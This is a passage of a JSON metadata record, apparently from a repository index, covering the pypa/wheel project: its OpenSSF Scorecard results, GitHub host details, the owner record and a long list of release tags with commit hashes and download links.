privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie